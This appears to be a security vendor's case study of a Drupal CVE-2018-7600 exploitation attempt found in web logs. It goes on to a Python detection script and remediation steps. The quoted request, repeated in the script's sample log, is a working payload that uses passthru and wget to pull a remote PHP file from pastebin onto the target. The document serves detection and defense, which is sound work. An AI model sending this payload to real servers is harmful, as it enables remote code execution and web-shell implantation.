A global management consulting firm with locations across the USA and UK.
EventTracker Co-Managed SIEM services, advanced endpoint protection, and behavior analytics would deliver added protection for company assets.
The Drupal CMS v7 and v8 are known to be vulnerable to a remote code execution attack; CVE-2018-7600 provides details. After the vulnerability was disclosed, the EventTracker SIEMphonic team monitored the web logs of external-facing web servers for evidence of such an attack.
A few weeks after the disclosure of the vulnerability, an exploitation attempt was observed as follows:
/?q=user/password&name[#post_render]=passthru&name[#type]=markup&name[#markup]=wget HTTP/1.1
Note the use of the #post_render and name parameters, targeting the user/password request and using PHP's passthru function. The wget argument (pastebin.com/raw/tBqLLGbw+-O+spy0x.php) retrieves a remote file and writes it to a local PHP file on the target host. The return code was 200, and the attacks were observed from a hosting provider in Amsterdam, NL.
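As an added illustration of how such an attempt can be picked out of web logs (example code, not part of the original case study or of EventTracker's product), the script below parses combined-format access log lines, URL-decodes the query string and flags requests carrying Drupal render-array keys such as #post_render. The log format and the sample lines are assumed/constructed; the first sample reproduces the request observed above in its URL-encoded form.

```python
import re
from urllib.parse import parse_qsl

# Drupal Form API render-array keys that have no business arriving in a
# query string. '#post_render' turns the value into a callable; '#type'
# and '#markup' are the supporting keys seen in the observed request.
RENDER_KEYS = {"#post_render", "#type", "#markup"}

# Apache/nginx "combined" log format (assumed; adjust for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A render-array key used as an array index, e.g. name[#post_render]
KEY_RE = re.compile(r"\[(#[A-Za-z_]+)\]")


def inspect_request(line):
    """Return a finding for a CVE-2018-7600-style request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Split on '?' only: urlsplit() would treat a raw '#' as a fragment
    # and silently drop the very keys we are looking for.
    path, _, query = m.group("target").partition("?")
    # parse_qsl URL-decodes keys, so name[%23post_render] is caught too.
    params = parse_qsl(query, keep_blank_values=True)
    hits = {}  # render key -> (query parameter, value)
    for key, value in params:
        for render_key in KEY_RE.findall(key):
            if render_key in RENDER_KEYS:
                hits[render_key] = (key.split("[", 1)[0], value)
    if not hits:
        return None
    post_render = "#post_render" in hits
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "route": dict(params).get("q") or path.lstrip("/"),
        "param": next(iter(hits.values()))[0],
        "keys": sorted(hits),
        # value of #post_render is the PHP function the request asks for
        "callback": hits["#post_render"][1] if post_render else None,
        # a 200 on an injected render array means the server processed it
        "severity": "critical" if post_render and m.group("status") == "200" else "high",
    }


def scan(lines):
    return [f for f in map(inspect_request, lines) if f]


# Constructed sample lines: the observed request (URL-encoded), then a
# benign load of the same password-reset page.
SAMPLE_LOG = [
    '203.0.113.10 - - [12/Apr/2018:10:15:32 +0000] "GET /?q=user/password&name[%23post_render]=passthru&name[%23type]=markup&name[%23markup]=wget+pastebin.com/raw/tBqLLGbw+-O+spy0x.php HTTP/1.1" 200 512 "-" "curl/7.58.0"',
    '198.51.100.7 - - [12/Apr/2018:10:16:01 +0000] "GET /?q=user/password HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with status 200 is the case the post describes and warrants immediate investigation of the host; hits with other status codes still identify the source IP for blocking.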
The EventTracker SIEMphonic team made the following recommendations:
- Upgrade to the most recent version of Drupal 7 or 8 core.
- If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until you are able to update completely.)
- If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until you are able to update completely.)
- Block the IP addresses in the proxy and firewall.
- Investigate the internal source system and proxy devices further.
- Install the latest version of your web server software, and ensure that all patches have been applied.
- Check the browser and system for infection, and run anti-virus scans.
- Use a web vulnerability scanner and integrate it with EventTracker.
- Harden and update the proxy and firewall with the IOCs.
Vulnerabilities are a fact of life. They exist, and they are disclosed and patched by vendors. Keeping on top of these across all vendors is a thankless and endless, but critical, task. Absent this, attacks like the Equifax breach will occur. Eternal vigilance is critical.